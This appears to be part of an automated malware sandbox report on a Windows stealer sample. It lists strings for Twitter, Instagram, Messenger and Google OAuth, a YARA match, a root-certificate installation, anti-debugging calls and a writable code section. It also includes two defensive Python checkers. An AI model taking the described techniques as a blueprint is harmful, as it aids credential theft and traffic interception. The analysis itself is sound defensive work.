Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp, ecvB803.tmp.11.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262299790.0000000003F62000.00000004.00000001.sdmp, ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/7
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvB803.tmp.11.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreU
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreh
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangoutsrx
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetingsrx
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 63C4F3D9EA0CC861.exe String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierraM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040AE4D OpenClipboard,

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
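The API chain above (CryptStringToBinaryA, CertCreateCertificateContext, CertOpenStore, CertAddCertificateContextToStore) decodes an embedded base64 certificate and adds it to a certificate store; once a root is trusted, TLS interception against the victim's browsers no longer raises a warning, which is why the report files it under E-Banking Fraud. The report does not record which store handle CertOpenStore returned, so on a suspect host both the machine Root store (`certutil -store Root`) and the current-user Root store (`certutil -user -store Root`, writable without administrator rights) should be dumped and compared with a clean baseline. The Python below is an added example, not code from the sample or from Joe Sandbox: it parses a certutil dump and reports every root whose SHA-1 thumbprint is not in the baseline. The dump text, the subject names and the thumbprints are constructed placeholders.

```python
"""Diff a certutil Root-store dump against a known-good thumbprint baseline.

Added example for this report; not code from the sample or from Joe Sandbox.
Input is the text that `certutil -store Root` / `certutil -user -store Root`
prints.  The dump below is constructed: placeholder names and thumbprints.
"""
import re

SAMPLE_STORE_DUMP = """\
Root "Trusted Root Certification Authorities"
================ Certificate 0 ================
Serial Number: 00
Issuer: CN=Example Vendor Root CA, O=Example Vendor
 NotBefore: 1/1/2010 12:00 AM
 NotAfter: 1/1/2030 12:00 AM
Subject: CN=Example Vendor Root CA, O=Example Vendor
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
================ Certificate 1 ================
Serial Number: 01
Issuer: CN=Injected Root, O=Unknown
 NotBefore: 1/30/2021 11:00 PM
 NotAfter: 1/30/2031 11:00 PM
Subject: CN=Injected Root, O=Unknown
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
CertUtil: -store command completed successfully.
"""

# Thumbprints captured earlier from a clean build of the same image
# (constructed placeholder; in practice export this from a golden host).
BASELINE_SHA1 = {"1111111111111111111111111111111111111111"}

# certutil separates certificates with a banner line of '=' characters.
_CERT_SPLIT = re.compile(r"^=+ Certificate \d+ =+$", re.M)
# Fields we care about; NotBefore/NotAfter are indented by one space.
_FIELD = re.compile(
    r"^\s*(Issuer|Subject|Cert Hash\(sha1\)|NotBefore|NotAfter):\s*(.+?)\s*$", re.M
)


def parse_store_dump(text: str):
    """Return one dict per certificate block in a certutil -store dump."""
    certs = []
    for block in _CERT_SPLIT.split(text)[1:]:  # element 0 is the store banner
        fields = {key: value for key, value in _FIELD.findall(block)}
        # certutil prints the SHA-1 as space-separated hex bytes; normalise it.
        sha1 = fields.get("Cert Hash(sha1)", "").replace(" ", "").lower()
        certs.append({
            "subject": fields.get("Subject", ""),
            "issuer": fields.get("Issuer", ""),
            "not_before": fields.get("NotBefore", ""),
            "sha1": sha1,
        })
    return certs


def unexpected_roots(text: str, baseline: set):
    """Roots in the dump whose SHA-1 thumbprint is not in the baseline."""
    return [cert for cert in parse_store_dump(text) if cert["sha1"] not in baseline]


if __name__ == "__main__":
    for cert in unexpected_roots(SAMPLE_STORE_DUMP, BASELINE_SHA1):
        print(f"UNEXPECTED ROOT  {cert['sha1']}  {cert['subject']}  (valid from {cert['not_before']})")
```

Run the dump for both stores and for every interactive user profile on the host; a root that is self-signed, recently valid and absent from the baseline is the artefact to pull and compare with the base64 blob embedded in the sample at 0_2_1001F720.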

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: fnhcdXEfus.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 63C4F3D9EA0CC861.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
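The two Static PE rows above show a .text section carrying IMAGE_SCN_MEM_WRITE together with IMAGE_SCN_MEM_EXECUTE. A normal linker emits .text as code, read and execute only; a writable code section is what self-decoding or packed code needs, which agrees with the "Detected unpacking" signature at the top of this report. The check is cheap to reproduce without a PE library. The Python below is an added example, not code from the sample or from Joe Sandbox: it walks the DOS header, COFF header and section table with struct alone and reports any section that is both writable and executable. The two images it inspects are constructed headers (no code, no imports), one mirroring the flag combination the report shows and one a normal .text.

```python
"""Flag PE sections that are both writable and executable (W+X).

Added example for this report; not code from the sample or from Joe Sandbox.
Stdlib only.  The PE images below are constructed header-only blobs so the
check runs offline; build_pe() exists only to produce that test input.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

_FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}


def parse_sections(data: bytes):
    """Return [(name, characteristics)] from the PE section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of 'PE\0\0'
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size                              # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsections):
        off = table + i * 40                                  # each header is 40 bytes
        raw_name = data[off:off + 8]
        (chars,) = struct.unpack_from("<I", data, off + 36)  # Characteristics is the last DWORD
        sections.append((raw_name.rstrip(b"\0").decode("ascii", "replace"), chars))
    return sections


def describe(chars: int) -> str:
    """Human-readable flag list in the same form the report prints."""
    return ", ".join(name for flag, name in _FLAG_NAMES.items() if chars & flag) or "none"


def wx_sections(data: bytes):
    """Names of sections whose characteristics include both WRITE and EXECUTE."""
    want = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [name for name, chars in parse_sections(data) if chars & want == want]


def build_pe(sections):
    """Build a minimal PE32 header with the given [(name, characteristics)].

    Constructed test input only: there is no code or import table, so the
    result cannot execute; it exists to exercise parse_sections().
    """
    opt_size = 0xE0                                           # PE32 optional header size
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # Magic = PE32, rest zeroed
    table = b""
    for name, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), 0x1000, 0x1000,
                             0x200, 0x400, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + opt + table


# Flag combination the report shows for fnhcdXEfus.exe / 63C4F3D9EA0CC861.exe.
SUSPICIOUS_TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# What a normally linked .text looks like: the same without WRITE.
NORMAL_TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

REPORT_LIKE = build_pe([(".text", SUSPICIOUS_TEXT), (".data", DATA)])
NORMAL = build_pe([(".text", NORMAL_TEXT), (".data", DATA)])

if __name__ == "__main__":
    for label, image in (("report-like", REPORT_LIKE), ("normal", NORMAL)):
        for name, chars in parse_sections(image):
            print(f"{label:12s} {name:8s} {describe(chars)}")
        print(f"{label:12s} W+X sections: {wx_sections(image)}")
```

Point `wx_sections(open(path, "rb").read())` at a real file to triage it. A W+X .text is a strong hint of in-place unpacking but not proof of malice on its own; some commercial protectors produce the same flags, so treat it as a reason to look at the unpacked memory images the report lists rather than as a verdict.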
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001D560: wsprintfW,CreateFileW,_memset,DeviceIoControl,FindCloseChangeNotification,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445630
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045015C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004506CC
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00450C3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409140
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409580
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445612
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445620
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004456C3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409870
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00461A30
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00451A3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445BD3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044E1E6
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004521B8
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00422751
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00406A40
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044AD9A
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00407162
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004073B5
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044B6B4
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100071F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10009257
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000B3B0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000B883
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100099E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000BC57
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000FF71
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000C063
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100060F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10008340
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000E380
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100083F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000C483
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10010590
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100169BD
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10010AED
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000ABA0
